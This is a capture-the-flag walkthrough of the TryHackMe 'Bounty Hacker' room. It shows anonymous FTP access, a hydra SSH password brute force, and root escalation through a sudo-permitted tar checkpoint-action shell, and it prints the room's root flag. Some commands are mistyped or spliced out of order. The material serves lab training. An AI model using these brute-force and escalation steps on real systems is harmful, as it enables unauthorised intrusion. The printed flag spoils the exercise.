Bounty Hunter Walkthrough | TryHackMe
You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!
Source: TryHackMe
Room: Bounty Hunter
Difficulty: Easy
Creator: ME
Hello Everyone!!! Hope you are doing well, this is a write-up of Bounty Hacker room in TryHackMe. So let’s get started and dive in straight.
1) Let's start a nmap scan with an aggressive mode
Command: nmap -a <MachineIP>
2 ) We can see that there are 3 ports opened among that we see that port 21(FTP) has Anonymous login enabled. Login into the FTP server with this command and give the username as anonymous.
Command: ftp <MachineIP>
┌──(kaarthik㉿Kaarthik)-[~/THM/BountyHunter]
└─$ ftp 10.10.128.243
Connected to 10.10.128.243.
220 (vsFTPd 3.0.3)
Name (10.10.128.243:kaarthik): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive off
Passive mode: off; fallback to active mode: off.
ftp> 3) Now we can see that there are two files which are locks.txt and task.txt in the FTP. Using the get command download the two files to the local system.
ftp>ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-rw-r-- 1 ftp ftp 418 Jun 07 2020 locks.txt
-rw-rw-r-- 1 ftp ftp 68 Jun 07 2020 task.txt
226 Directory send OK.
ftp> get locks.txt
local: locks.txt remote: locks.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for locks.txt (418 bytes).
100% |*******************************************| 418 9.05 MiB/s 00:00 ETA
226 Transfer complete.
418 bytes received in 00:00 (1.41 KiB/s)
ftp> get task.txt
local: task.txt remote: task.txt
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for task.txt (68 bytes).
100% |*******************************************| 68 1.54 MiB/s 00:00 ETA
226 Transfer complete.
68 bytes received in 00:00 (0.23 KiB/s)
ftp>4) With the help of the cat command we opened text files, where locks.txt have some set of passwords and task.txt have some information with the author name!
Commands:
cat locks.txt
cat tasks.txt
5) As we have the username and a list of passwords now we have to enumerate and attack a service with these credentials. We already know that ssh port is open and we are going to attack this service using hydra as it brute forces the username with the list of passwords.
Command: hydra -l lin -P locks.txt ssh://<MachineIP>
6) As we have got credentials successfully now we can perform ssh into the machine by using the following command, enter the password once it popped.
Command: ssh lin@<MachineIP>
Then change directory to /home/lin/Desktop and here we will find the user.txt flag.
Boom !!! Now we have the user access on the system .
7) Now its time to escalate into the root user. let's us run sudo -l to check the privileges of the user.
lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin:
Matching Defaults entries for lin on bountyhacker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser lin may run the following commands on bountyhacker:
(root) /bin/tar
8) Now we can see that the user can run /bin/tar binary with root privileges. As this is confirmed let us look at GTFO bins for tar files. We can find the command below the sudo section, Just paste the link in the ssh and now, we have successfully escalated your privileges to root. Now it’s easy to find the root flag.
lin@bountyhacker:~/Desktop$
--checkpoint-action=exec=/bin/shsudo tar -cf /dev/null /dev/null --checkpoint=1
tar: Removing leading `/' from member names
# whoami
root
# ls
user.txt
# cd ..
# ls
Desktop Documents Downloads Music Pictures Public Templates Videos
# cd ..
# ls
lin
# cd ..
# ls
bin dev initrd.img lib64 mnt root snap tmp vmlinuz
boot etc initrd.img.old lost+found opt run srv usr vmlinuz.old
cdrom home lib media proc sbin sys var
# cd root
# ls
root.txt
# cat root.txt
THM{80UN7Y_h4cK3r}
#Finally we got the root flag!!!😎🚩
Come-on Let's get connected!
Twitter:- https://twitter.com/Itz_kaarthik
Email:- g.kaarthik12@gmail.com
Linkdin:- https://www.linkedin.com/in/kaarthikeyeng
